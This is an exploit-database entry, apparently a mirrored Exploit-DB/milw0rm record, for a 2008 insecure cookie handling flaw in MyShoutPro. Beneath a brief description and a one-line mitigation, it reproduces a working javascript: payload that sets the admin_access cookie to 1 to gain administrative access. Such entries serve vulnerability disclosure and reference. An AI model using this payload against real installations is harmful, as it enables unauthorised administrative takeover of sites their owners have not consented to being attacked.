header-logo
Suggest Exploit
vendor:
MyShoutPro
by:
Stack
7.5
CVSS
HIGH
Insecure Cookie Handling
614
CWE
Product Name: MyShoutPro
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

MyShoutPro Insecure Cookie Handling Vulnerability

A vulnerability in MyShoutPro allows an attacker to set arbitrary cookies. An attacker can set the admin_access cookie to 1, granting them administrative access to the application.

Mitigation:

Ensure that cookies are properly validated and sanitized before being used.
Source

Exploit-DB raw data:

   	     ########################################################################
             #                                                                      #
             # ...:::::MyShoutPro   Insecure Cookie Handling Vulnerability ::::.... #         
             ########################################################################
 
--------
Discoverd By :Stack
Home : http://v4-team.com
---
exploit:
javascript:document.cookie = "admin_access=1; path=/"; document.cookie = "admin_access=1; path=/";
-----

# milw0rm.com [2008-06-17]